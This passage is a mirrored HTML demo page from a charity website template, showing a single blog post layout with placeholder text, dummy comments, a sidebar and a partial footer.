<!DOCTYPE html>
<html lang="en">


<!-- Mirrored from demos.codexcoder.com/labartisan/html/GreenForest/blog_single.html by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 17 Feb 2019 23:31:46 GMT -->
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Single Blog</title>
    <link rel="shortcut icon" type="image/x-icon" href="assets/images/favicon.ico" />
    <!-- Plugin css -->
    <link rel="stylesheet" type="text/css" href="assets/css/font-awesome.min.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/fonts/flaticon.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/css/bootstrap.min.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/css/animate.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/css/swiper.min.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/css/lightcase.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/css/jquery.nstSlider.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/css/flexslider.css" media="all" />

    <!-- own style css -->
    <link rel="stylesheet" type="text/css" href="assets/css/style.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/css/rtl.css" media="all" />
    <link rel="stylesheet" type="text/css" href="assets/css/responsive.css" media="all" />

</head>

<body>
    <div class="box-layout">

    <div class="box-style">
        <div class="color-btn">
            <a href="#"><i class="fa fa-cog fa-spin" aria-hidden="true"></i></a>
        </div>
        <div class="box-style-inner">
            <h3>Box Layout</h3>
            <div class="box-element">
                <div class="box-heading">
                    <h5>HTML Layout</h5>
                </div>
                <div class="box-content">
                    <ul class="box-customize">
                        <li><a class="boxed-btn" href="#">Boxed</a></li>
                        <li><a class="wide-btn" href="#">Wide</a></li>
                        <li><a class="rtl-btn" href="#">Rtl</a></li>
                        <li><a class="ltl-btn" href="#">Ltl</a></li>
                    </ul>
                </div>
            </div>
            <div class="box-element">
                <div class="box-heading">
                    <h5>Backgroud Images</h5>
                </div>
                <div class="box-content">
                    <ul class="box-bg-img">
                        <li>
                            <a class="bg-1" href="#"><img src="assets/images/box-style/01.jpg" alt=""></a>
                        </li>
                        <li>
                            <a class="bg-2" href="#"><img src="assets/images/box-style/02.jpg" alt=""></a>
                        </li>
                        <li>
                            <a class="bg-3" href="#"><img src="assets/images/box-style/03.jpg" alt=""></a>
                        </li>
                        <li>
                            <a class="bg-4" href="#"><img src="assets/images/box-style/04.jpg" alt=""></a>
                        </li>
                        <li>
                            <a class="bg-5" href="#"><img src="assets/images/box-style/05.jpg" alt=""></a>
                        </li>
                        <li>
                            <a class="bg-6" href="#"><img src="assets/images/box-style/06.jpg" alt=""></a>
                        </li>
                        <li>
                            <a class="bg-7" href="#"><img src="assets/images/box-style/07.jpg" alt=""></a>
                        </li>
                        <li>
                            <a class="bg-8" href="#"><img src="assets/images/box-style/08.jpg" alt=""></a>
                        </li>
                    </ul>
                </div>
            </div>
            <div class="box-element">
                <div class="box-heading">
                    <h5>Backgroud Pattern</h5>
                </div>
                <div class="box-content">
                    <ul class="box-pattern-img">
                        <li>
                            <a class="pt-1" href="#"><img src="assets/images/box-style/01.jpg" alt=""></a>
                        </li>
                        <li>
                            <a class="pt-2" href="#"><img src="assets/images/box-style/01.jpg" alt=""></a>
                        </li>
                        <li>
                            <a class="pt-3" href="#"><img src="assets/images/box-style/01.jpg" alt=""></a>
                        </li>
                        <li>
                            <a class="pt-4" href="#"><img src="assets/images/box-style/01.jpg" alt=""></a>
                        </li>
                        <li>
                            <a class="pt-5" href="#"><img src="assets/images/box-style/01.jpg" alt=""></a>
                        </li>
                        <li>
                            <a class="pt-6" href="#"><img src="assets/images/box-style/01.jpg" alt=""></a>
                        </li>
                        <li>
                            <a class="pt-7" href="#"><img src="assets/images/box-style/01.jpg" alt=""></a>
                        </li>
                        <li>
                            <a class="pt-8" href="#"><img src="assets/images/box-style/01.jpg" alt=""></a>
                        </li>
                    </ul>
                </div>
            </div>
        </div>
    </div>

        <header class="header-style-2">
            <div class="bg-header-top">
                <div class="container">
                    <div class="row">
                        <div class="header-top">
                            <ul class="h-contact">
                                <li><i class="flaticon-time-left"></i> Time : Tusday-Monday : 9:00am-6:00pm</li>
                                <li><i class="flaticon-vibrating-phone"></i> Phone : +88017 923 970 659</li>
                                <li><i class="flaticon-placeholder"></i> Address : Sute 07 Sahara Center</li>
                            </ul>
                            <div class="donate-option">
                                <a href="donate.html"><i class="fa fa-heart" aria-hidden="true"></i> donate now</a>
                            </div>
                            <!-- .donate-option -->
                        </div>
                        <!-- .header-top -->
                    </div>
                    <!-- .header-top -->
                </div>
                <!-- .container -->
            </div>
            <!-- .bg-header-top -->

            <!-- Start Menu -->
            <div class="bg-main-menu menu-scroll">
                <div class="container">
                    <div class="row">
                        <div class="main-menu">
                            <a class="show-res-logo" href="index.html"><img src="assets/images/home01/logo.png" alt="logo" class="img-responsive" /></a>
                            <nav class="navbar">
                                <!-- Brand and toggle get grouped for better mobile display -->
                                <div class="navbar-header">
                                    <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
								<span class="sr-only">Toggle navigation</span>
								<span class="icon-bar"></span>
								<span class="icon-bar"></span>
								<span class="icon-bar"></span>
							  </button>
                                    <a class="navbar-brand" href="index.html"><img src="assets/images/home01/logo.png" alt="logo" class="img-responsive" /></a>
                                </div>
                                <!-- Collect the nav links, forms, and other content for toggling -->
                                <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
                                    <ul class="nav navbar-nav">
                                        <li class="dropdown">
                                            <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">HOME <span class="caret"></span></a>
                                            <ul class="dropdown-menu sub-menu">
                                                <li><a href="index.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Home Page one</a></li>
                                                <li><a href="home02.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Home Page two</a></li>
                                                <li><a href="home03.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Home Page three</a></li>
                                                <li><a href="home_box.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Home Box style</a></li>
                                                <li><a href="home_onepage.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Home One Page</a></li>
                                                <li><a href="index-rtl.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> الصفحة الرئيسية رتل</a></li>
                                            </ul>
                                        </li>
                                        <li><a href="about.html">About</a></li>
                                        <li class="dropdown">
                                            <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Services <span class="caret"></span></a>
                                            <ul class="dropdown-menu sub-menu">
                                                <li><a href="services.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Services</a></li>
                                                <li><a href="service_single.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Single Service</a></li>
                                            </ul>
                                        </li>
                                        <li class="dropdown">
                                            <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">pages<span class="caret"></span></a>
                                            <ul class="dropdown-menu sub-menu">
                                                <li class="dropdown">
                                                    <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Our Team<span class="caret"></span></a>
                                                    <ul class="dropdown-menu sub-sub-menu">
                                                        <li><a href="team.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Team</a></li>
                                                        <li><a href="team_single.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Single Team</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown">
                                                    <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Our project<span class="caret"></span></a>
                                                    <ul class="dropdown-menu sub-sub-menu">
                                                        <li><a href="project.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Projects</a></li>
                                                        <li><a href="project_single.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Single Project</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown">
                                                    <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Shop<span class="caret"></span></a>
                                                    <ul class="dropdown-menu sub-sub-menu">
                                                        <li><a href="shop.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Shop</a></li>
                                                        <li><a href="shop_single.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Single Shop</a></li>
                                                        <li><a href="shop_cart.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Shop Cart</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown">
                                                    <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Campaign<span class="caret"></span></a>
                                                    <ul class="dropdown-menu sub-sub-menu">
                                                        <li><a href="campaign.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Campaign</a></li>
                                                        <li><a href="campaign_single.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Single Campaign</a></li>
                                                    </ul>
                                                </li>
                                                <li><a href="donate.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Donate Page</a></li>
                                                <li><a href="404_page.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> 404 Page</a></li>
                                            </ul>
                                        </li>
                                        <li class="dropdown">
                                            <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Events <span class="caret"></span></a>
                                            <ul class="dropdown-menu sub-menu">
                                                <li><a href="event.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Events</a></li>
                                                <li><a href="event_single.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Single Event</a></li>
                                            </ul>
                                        </li>
                                        <li class="dropdown">
                                            <a href="#" class="dropdown-toggle active" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Blog <span class="caret"></span></a>
                                            <ul class="dropdown-menu sub-menu">
                                                <li><a href="blog.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Blog</a></li>
                                                <li><a href="blog_02.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Blog style 02</a></li>
                                                <li class="sub-active"><a href="blog_single.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Single Blog</a></li>
                                            </ul>
                                        </li>
                                        <li class="dropdown">
                                            <a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Gallery <span class="caret"></span></a>
                                            <ul class="dropdown-menu sub-menu">
                                                <li><a href="gallery.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Gallery</a></li>
                                                <li><a href="gallery_02.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Gallery 02</a></li>
                                                <li><a href="gallery_03.html"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Gallery 03</a></li>
                                            </ul>
                                        </li>
                                        <li><a href="contact.html">contacts</a></li>
                                    </ul>
                                    <div class="menu-right-option pull-right">
                                        <div class="cart-option">
                                            <div class="cart-icon">
                                                <i class="fa fa-shopping-cart" aria-hidden="true"></i>
                                                <div class="count-cart">2</div>
                                            </div>
                                            <!-- .cart-icon -->
                                            <div class="cart-dropdown-menu">
                                                <div class="cart-items">
                                                    <div class="cart-img">
                                                        <a href="single_shop_cat.html"><img src="assets/images/home01/cart-img-1.jpg" alt="cart-img-1"></a>
                                                    </div>
                                                    <div class="cart-content">
                                                        <h6><a href="single_shop_cat.html">Product Title Here</a></h6>
                                                        <p>1*<span>$350</span></p>
                                                    </div>
                                                    <div class="cart-btn">
                                                        <a href="#"><i class="fa fa-pencil" aria-hidden="true"></i></a>
                                                        <a href="#"><i class="fa fa-times" aria-hidden="true"></i></a>
                                                    </div>
                                                    <div class="clr"></div>
                                                </div>
                                                <!-- .cart-items -->

                                                <div class="cart-items">
                                                    <div class="cart-img">
                                                        <a href="#"><img src="assets/images/home01/cart-img-2.jpg" alt="cart-img-2"></a>
                                                    </div>
                                                    <div class="cart-content">
                                                        <h6><a href="single_shop_cat.html">Product Title Here</a></h6>
                                                        <p>1*<span>$350</span></p>
                                                    </div>
                                                    <div class="cart-btn">
                                                        <a href="#"><i class="fa fa-pencil" aria-hidden="true"></i></a>
                                                        <a href="#"><i class="fa fa-times" aria-hidden="true"></i></a>
                                                    </div>
                                                    <div class="clr"></div>
                                                </div>
                                                <!-- .cart-items -->
                                                <div class="cart-items">
                                                    <div class="cart-img">
                                                        <a href="#"><img src="assets/images/home01/cart-img-3.jpg" alt="cart-img-3"></a>
                                                    </div>
                                                    <div class="cart-content">
                                                        <h6><a href="single_shop_cat.html">Product Title Here</a></h6>
                                                        <p>1*<span>$350</span></p>
                                                    </div>
                                                    <div class="cart-btn">
                                                        <a href="#"><i class="fa fa-pencil" aria-hidden="true"></i></a>
                                                        <a href="#"><i class="fa fa-times" aria-hidden="true"></i></a>
                                                    </div>
                                                    <div class="clr"></div>
                                                </div>
                                                <!-- .cart-items -->
                                                <div class="total-price">
                                                    <p><span>Total Price :</span> $700 </p>
                                                </div>
                                                <!-- .total-prices -->
                                                <div class="checkout-btn">
                                                    <a href="#" class="btn btn-default">donate now</a>
                                                </div>
                                            </div>
                                            <!-- .cart-dropdown-menu -->
                                        </div>
                                        <!-- .cart-option -->

                                        <div class="search-box">
                                            <i class="fa fa-search first_click" aria-hidden="true" style="display: block;"></i>
                                            <i class="fa fa-times second_click" aria-hidden="true" style="display: none;"></i>
                                        </div>
                                        <div class="search-box-text">
                                            <form action="http://demos.codexcoder.com/labartisan/html/GreenForest/search">
                                                <input type="text" name="search" id="all-search" placeholder="Search Here">
                                            </form>
                                        </div>
                                    </div>
                                    <!-- .header-search-box -->
                                </div>
                                <!-- .navbar-collapse -->
                            </nav>
                        </div>
                        <!-- .main-menu -->
                    </div>
                    <!-- .row -->
                </div>
                <!-- .container -->
            </div>
            <!-- .bg-main-menu -->
        </header>

        <!-- Start Page Header Section -->

        <section class="bg-page-header">
            <div class="page-header-overlay">
                <div class="container">
                    <div class="row">
                        <div class="page-header">
                            <div class="page-title">
                                <h2>blog single post</h2>
                            </div>
                            <!-- .page-title -->
                            <div class="page-header-content">
                                <ol class="breadcrumb">
                                    <li><a href="index.html">Home</a></li>
                                    <li>blog</li>
                                </ol>
                            </div>
                            <!-- .page-header-content -->
                        </div>
                        <!-- .page-header -->
                    </div>
                    <!-- .row -->
                </div>
                <!-- .container -->
            </div>
            <!-- .page-header-overlay -->
        </section>


        <!-- End Page Header Section -->



        <!-- Start Single Events Section -->




        <section class="bg-single-blog">
            <div class="container">
                <div class="row">
                    <div class="single-blog">
                        <div class="row">
                            <div class="col-md-8">

                                <div class="blog-items">
                                    <div class="blog-img">
                                        <a href="#"><img src="assets/images/blog/blog-img-10.jpg" alt="blog-img-10" class="img-responsive" /></a>
                                    </div>
                                    <!-- .blog-img -->
                                    <div class="blog-content-box">
                                        <div class="meta-box">
                                            <div class="event-author-option">
                                                <div class="event-author-img">
                                                    <img src="assets/images/event/event-author-img-1.jpg" alt="event-author-img-1" />
                                                </div>
                                                <!-- .author-img -->
                                                <div class="event-author-name">
                                                    <p>Posted by : <a href="#"> Robot Smith</a></p>
                                                </div>
                                                <!-- .author-name -->
                                            </div>
                                            <!-- .author-option -->
                                            <ul class="meta-post">
                                                <li><i class="fa fa-calendar" aria-hidden="true"></i> 22.04.2017</li>
                                                <li><a href="#"><i class="fa fa-heart-o" aria-hidden="true"></i> 24 Like</a></li>
                                                <li><a href="#"><i class="fa fa-commenting-o" aria-hidden="true"></i> 24 Comment</a></li>
                                            </ul>
                                        </div>
                                        <!-- .meta-box -->
                                        <div class="blog-content">
                                            <h4>rctuale Ceterc Stalecent centric color</h4>

                                            <p>Progressively brand sticky whit without frictionless vortals visualize cost effective networks viral Progressively redefine efficient platforms for cuttingedge business develop extensive aservices Collaboratively conceptualize future-proof partnerships through holistic aproducts progreively brand sticky ROI without frictionless vortals. Assertively visualize cost effective networks visavis viral experiences. Progressively redefine efficient platforms for awesome cuttingedge business. Conveniently develop extensive services a effective quality vectors. Colaboratvely coeptualize future-proof partnerships through holistic products.</p>

                                            <p class="quate-para">Completely actuaze cent centric coloration and idea saharng without an installed awesome theme of event aresourcescreatve awesome template and completely and awesome event template and awesome event template.</p>
                                            <p>Progressively brand sticky whit without frictionless vortals visualize cost effective networks viral Progressively redefine efficient platforms for cuttingedge business develop extensive aservices Collaboratively conceptualize future-proof partnerships through holistic aproducts progreively brand sticky ROI without frictionless vortals. Assertively visualize cost effective networks visavis viral experiences. Progressively redefine efficient platforms for awesome cuttingedge business. Conveniently develop extensive services a effective quality vectors. Colaboratvely coeptualize future-proof partnerships through holistic products.</p>
                                        </div>
                                        <!-- .blog-content -->
                                        <div class="single-blog-bottom">
                                            <ul class="tags">
                                                <li><i class="fa fa-tags" aria-hidden="true"></i> Tags :</li>
                                                <li><a href="#">Dantal</a></li>
                                                <li><a href="#">Charity</a></li>
                                                <li><a href="#">Environmental</a></li>
                                                <li><a href="#">Business</a></li>
                                            </ul>
                                            <!-- .author-option -->
                                            <div class="event-share-option">
                                                <ul class="social-icon share-icon">
                                                    <li><i class="fa fa-share-alt" aria-hidden="true"></i><span>share :</span></li>
                                                    <li><a href="#"><i class="fa fa-facebook" aria-hidden="true"></i></a></li>
                                                    <li><a href="#"><i class="fa fa-google-plus" aria-hidden="true"></i></a></li>
                                                    <li><a href="#"><i class="fa fa-dribbble" aria-hidden="true"></i></a></li>
                                                    <li><a href="#"><i class="fa fa-vimeo" aria-hidden="true"></i></a></li>
                                                    <li><a href="#"><i class="fa fa-pinterest-p" aria-hidden="true"></i></a></li>
                                                </ul>
                                            </div>
                                            <!-- .share-option -->
                                        </div>
                                        <!-- .single-blog-bottom -->
                                    </div>
                                    <!-- .blog-content-box -->
                                </div>
                                <!-- .blog-items -->
                                <div class="comments-option">
                                    <h4 class="comments-title">04 Comments</h4>
                                    <div class="comments-items">
                                        <div class="comments-image">
                                            <img src="assets/images/blog/comments-author-img-1.jpg" alt="comments-author-img-1" />
                                        </div>
                                        <!-- .comments-image -->
                                        <div class="comments-content">
                                            <div class="comments-author-title">
                                                <div class="comments-author-name">
                                                    <h4><a href="#">JANATON DOE</a> - <small>02 Days Ago At 10:30pm</small></h4>
                                                </div>
                                                <div class="reply-icon">
                                                    <h6><i class="fa fa-reply-all"></i><a href="#"> Reply</a></h6>
                                                </div>
                                            </div>
                                            <!-- .comments-author-title -->
                                            <p>Professionally optimize intermandated data rather than goal and oriented and band width Seamlesly and the extend distinctive awesome charity web services an eamlesly and the extend distinctive awesome charity web services.</p>
                                        </div>
                                        <!-- .comments-content -->
                                    </div>
                                    <!-- .comments-items -->
                                    <div class="comments-items">
                                        <div class="comments-image">
                                            <img src="assets/images/blog/comments-author-img-2.jpg" alt="comments-author-img-2" />
                                        </div>
                                        <!-- .comments-image -->
                                        <div class="comments-content">
                                            <div class="comments-author-title">
                                                <div class="comments-author-name">
                                                    <h4><a href="#">robot smith </a> - <small>02 Days Ago At 10:30pm</small></h4>
                                                </div>
                                                <div class="reply-icon">
                                                    <h6><i class="fa fa-reply-all"></i><a href="#"> Reply</a></h6>
                                                </div>
                                            </div>
                                            <!-- .comments-author-title -->
                                            <p>Professionally optimize intermandated data rather than goal and oriented and band width Seamlesly and the extend distinctive awesome charity web services an eamlesly and the extend distinctive awesome charity web services.</p>
                                        </div>
                                        <!-- .comments-content -->
                                    </div>
                                    <!-- .comments-items -->
                                    <div class="comments-items">
                                        <div class="comments-image">
                                            <img src="assets/images/blog/comments-author-img-3.jpg" alt="comments-author-img-3" />
                                        </div>
                                        <!-- .comments-image -->
                                        <div class="comments-content">
                                            <div class="comments-author-title">
                                                <div class="comments-author-name">
                                                    <h4><a href="#">joly khan </a> - <small>02 Days Ago At 10:30pm</small></h4>
                                                </div>
                                                <div class="reply-icon">
                                                    <h6><i class="fa fa-reply-all"></i><a href="#"> Reply</a></h6>
                                                </div>
                                            </div>
                                            <!-- .comments-author-title -->
                                            <p>Professionally optimize intermandated data rather than goal and oriented and band width Seamlesly and the extend distinctive awesome charity web services an eamlesly and the extend distinctive awesome charity web services.</p>
                                        </div>
                                        <!-- .comments-content -->
                                    </div>
                                    <!-- .comments-items -->
                                    <div class="comments-items">
                                        <div class="comments-image">
                                            <img src="assets/images/blog/comments-author-img-4.jpg" alt="comments-author-img-4" />
                                        </div>
                                        <!-- .comments-image -->
                                        <div class="comments-content">
                                            <div class="comments-author-title">
                                                <div class="comments-author-name">
                                                    <h4><a href="#">smith jhonson </a> - <small>02 Days Ago At 10:30pm</small></h4>
                                                </div>
                                                <div class="reply-icon">
                                                    <h6><i class="fa fa-reply-all"></i><a href="#"> Reply</a></h6>
                                                </div>
                                            </div>
                                            <!-- .comments-author-title -->
                                            <p>Professionally optimize intermandated data rather than goal and oriented and band width Seamlesly and the extend distinctive awesome charity web services an eamlesly and the extend distinctive awesome charity web services.</p>
                                        </div>
                                        <!-- .comments-content -->
                                    </div>
                                    <!-- .comments-items -->
                                </div>
                                <!-- .comments-option -->

                                <div class="comments-form">
                                    <h4 class="comments-title">Leave A Reply</h4>
                                    <form action="#" method="POST">
                                        <div class="row">
                                            <div class="col-md-4">
                                                <div class="form-group">
                                                    <input type="email" class="form-control" id="nameId" name="name" placeholder="Name*">
                                                </div>
                                            </div>
                                            <!-- .col-md-4 -->
                                            <div class="col-md-4">
                                                <div class="form-group">
                                                    <input type="email" class="form-control" id="emailId" name="email" placeholder="Email*">
                                                </div>
                                            </div>
                                            <!-- .col-md-4 -->
                                            <div class="col-md-4">
                                                <div class="form-group">
                                                    <input type="text" class="form-control" id="websiteId" name="website" placeholder="Website">
                                                </div>
                                            </div>
                                            <!-- .col-md-4 -->
                                        </div>
                                        <!-- .row -->
                                        <textarea class="form-control comments-textarea" placeholder="Comments*"></textarea>

                                        <button type="submit" class="btn btn-default">submit Comment</button>
                                    </form>
                                </div>
                                <!-- .comments-form -->

                            </div>
                            <!-- .col-md-8 -->
                            <div class="col-md-4">
                                <div class="sidebar">
                                    <div class="widget">
                                        <div class="widget-content">
                                            <form action="#" method="POST" class="sidebar-form">
                                                <div class="form-group">
                                                    <input type="text" class="form-control" id="searchId" name="search" placeholder="Search...">
                                                    <i class="fa fa-search" aria-hidden="true"></i>
                                                </div>
                                            </form>
                                        </div>
                                        <!-- .widget-content -->
                                    </div>
                                    <!-- .widget -->


                                    <div class="widget">
                                        <h4 class="sidebar-widget-title">All Categores</h4>
                                        <div class="widget-content">
                                            <ul class="catagories">
                                                <li><a href="#"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Brand Creation <span>05</span></a></li>
                                                <li><a href="#"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Company Analysis <span>06</span></a></li>
                                                <li><a href="#"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Corporate Identity<span>07</span></a></li>
                                                <li><a href="#"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Funding<span>08</span></a></li>
                                                <li><a href="#"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Medical<span>15</span></a></li>
                                                <li><a href="#"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Strategy Planning<span>20</span></a></li>
                                                <li><a href="#"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Uncategorized<span>25</span></a></li>
                                                <li><a href="#"><i class="fa fa-angle-double-right" aria-hidden="true"></i> Video Production<span>30</span></a></li>

                                            </ul>
                                        </div>
                                        <!-- .widget-content -->
                                    </div>
                                    <!-- .widget -->
                                    <div class="widget">
                                        <h4 class="sidebar-widget-title">Popular News</h4>
                                        <div class="widget-content">
                                            <ul class="popular-news-option">
                                                <li>
                                                    <div class="popular-news-img">
                                                        <a href="#"><img src="assets/images/event/popular-news-img-1.jpg" alt="popular-news-img-1" /></a>
                                                    </div>
                                                    <!-- .popular-news-img -->
                                                    <div class="popular-news-contant">
                                                        <h5><a href="#">Foulate revlunry a mihare awesome the theme.</a></h5>
                                                        <p>04 February 2016</p>
                                                    </div>
                                                    <!-- .popular-news-img -->
                                                </li>
                                                <li>
                                                    <div class="popular-news-img">
                                                        <a href="#"><img src="assets/images/event/popular-news-img-2.jpg" alt="popular-news-img-2" /></a>
                                                    </div>
                                                    <!-- .popular-news-img -->
                                                    <div class="popular-news-contant">
                                                        <h5><a href="#">Foulate revlunry a mihare awesome the theme.</a></h5>
                                                        <p>04 February 2016</p>
                                                    </div>
                                                    <!-- .popular-news-img -->
                                                </li>
                                                <li>
                                                    <div class="popular-news-img">
                                                        <a href="#"><img src="assets/images/event/popular-news-img-3.jpg" alt="popular-news-img-3" /></a>
                                                    </div>
                                                    <!-- .popular-news-img -->
                                                    <div class="popular-news-contant">
                                                        <h5><a href="#">Foulate revlunry a mihare awesome the theme.</a></h5>
                                                        <p>04 February 2016</p>
                                                    </div>
                                                    <!-- .popular-news-img -->
                                                </li>
                                            </ul>

                                        </div>
                                        <!-- .widget-content -->
                                    </div>
                                    <!-- .widget -->
                                    <div class="widget">
                                        <h4 class="sidebar-widget-title">photo gallery</h4>
                                        <div class="widget-content">
                                            <div class="gallery-instagram">
                                                <a href="#"><img src="assets/images/event/photo-gallery-small-img-1.jpg" alt="photo-gallery-small-img-1"></a>
                                                <a href="#"><img src="assets/images/event/photo-gallery-small-img-2.jpg" alt="footer-instagram-img-2"></a>
                                                <a href="#"><img src="assets/images/event/photo-gallery-small-img-3.jpg" alt="footer-instagram-img-3"></a>
                                                <a href="#"><img src="assets/images/event/photo-gallery-small-img-4.jpg" alt="footer-instagram-img-4"></a>
                                                <a href="#"><img src="assets/images/event/photo-gallery-small-img-5.jpg" alt="footer-instagram-img-5"></a>
                                                <a href="#"><img src="assets/images/event/photo-gallery-small-img-6.jpg" alt="footer-instagram-img-6"></a>
                                                <a href="#"><img src="assets/images/event/photo-gallery-small-img-7.jpg" alt="footer-instagram-img-7"></a>
                                                <a href="#"><img src="assets/images/event/photo-gallery-small-img-8.jpg" alt="footer-instagram-img-8"></a>
                                                <a href="#"><img src="assets/images/event/photo-gallery-small-img-9.jpg" alt="footer-instagram-img-9"></a>

                                            </div>
                                            <!-- .gallery-instagram -->
                                        </div>
                                        <!-- .widget-content -->
                                    </div>
                                    <!-- .widget -->
                                    <div class="widget">
                                        <h4 class="sidebar-widget-title">Popular Tags</h4>
                                        <div class="widget-content">
                                            <div class="tag-cloud">
                                                <a href="#" class="btn">children</a>
                                                <a href="#" class="btn">school</a>
                                                <a href="#" class="btn">shop</a>
                                                <a href="#" class="btn">water</a>
                                                <a href="#" class="btn">charity</a>
                                                <a href="#" class="btn">heaven</a>
                                                <a href="#" class="btn">Blog</a>
                                                <a href="#" class="btn">Contant</a>
                                                <a href="#" class="btn">Design</a>
                                            </div>
                                            <!-- .tag-cloud -->
                                        </div>
                                        <!-- .widget-content -->
                                    </div>
                                    <!-- .widget -->
                                </div>
                                <!-- .sidebar -->
                            </div>
                            <!-- .col-md-4 -->
                        </div>
                        <!-- .row -->
                    </div>
                    <!-- .single-blog -->
                </div>
                <!-- .row -->
            </div>
            <!-- .container -->
        </section>


        <!-- End Single Events Section -->


        <!-- Start Footer Section -->

        <footer>
            <div class="bg-footer-top">
                <div class="container">
                    <div class="row">
                        <div class="footer-top">
                            <div class="row">
                                <div class="col-md-3 col-sm-6">
                                    <div class="footer-widgets">
                                        <div class="widgets-title">
                                            <h3>About us</h3>
                                        </div>
                                        <!-- .widgets-title -->
                                        <div class="widgets-content">
                                            <p>Distily enable team driven services through extensive is a relatonships platforms with interactive content. Enthusiastically scale effective.</p>
                                        </div>
                                        <!-- .widgets-content -->
                                        <div class="address-box">
                                            <ul class="address">
                                                <li>
                                                    <i class="fa fa-home" aria-hidden="true"></i>
                                                    <span>New Chokoya Road, USA.</span>
                                                </li>
                                                <li>
                                                    <i class="fa fa-phone" aria-hidden="true"></i>
                                                    <span>+8801 923 970 698.</span>
                                                </li>
                                                <li>
                                                    <i class="fa fa-envelope-o" aria-hidden="true"></i>
                                                    <span>Contact@admin.com</span>

                                                </li>
                                                <li>
                                                    <i class="fa fa-globe" aria-hidden="true"></i>
                                                    <span>Emai@admin.com</span>
                                                </li>
                                            </ul>
                                        </div>
                                        <!-- .address -->
                                    </div>
                                    <!-- .footer-widgets -->
                                </div>
                                <!-- .col-md-3 -->
                                <div class="col-md-3 col-sm-6">
                                    <div class="footer-widgets">
                                        <div class="widgets-title">
                                            <h3>Latest News</h3>
                                        </div>
                                        <!-- .widgets-title -->
                                        <ul class="latest-news">
                                            <li>
                                                <span class="thumbnail-img">
												<img src="assets/images/home01/small-bog-img-1.jpg" alt="small-bog-img-1" class="img-responsive" />
											</span>
                                                <div class="thumbnail-content">
                                                    <h5><a href="#">Corem psum dolr them amectetuer adipiscing...</a></h5>
                                                    <span class="post-date">04 February 2017</span>
                                                </div>
                                                <!-- .thumbnail-content -->
                                            </li>
                                            <li>
                                                <span class="thumbnail-img">
												<img src="assets/images/home01/small-bog-img-2.jpg" alt="small-bog-img-2" class="img-responsive" />
											</span>
                                                <div class="thumbnail-content">
                                                    <h5><a href="#">Mirum est notare quam littera gothica nunc...</a></h5>
                                                    <span class="post-date">28 January 2017</span>
                                                </div>
                                                <!-- .thumbnail-content -->
                                            </li>
                                            <li>
                                                <span class="thumbnail-img">
												<img src="assets/images/home01/small-bog-img-3.jpg" alt="small-bog-img-3" class="img-responsive" />
											</span>
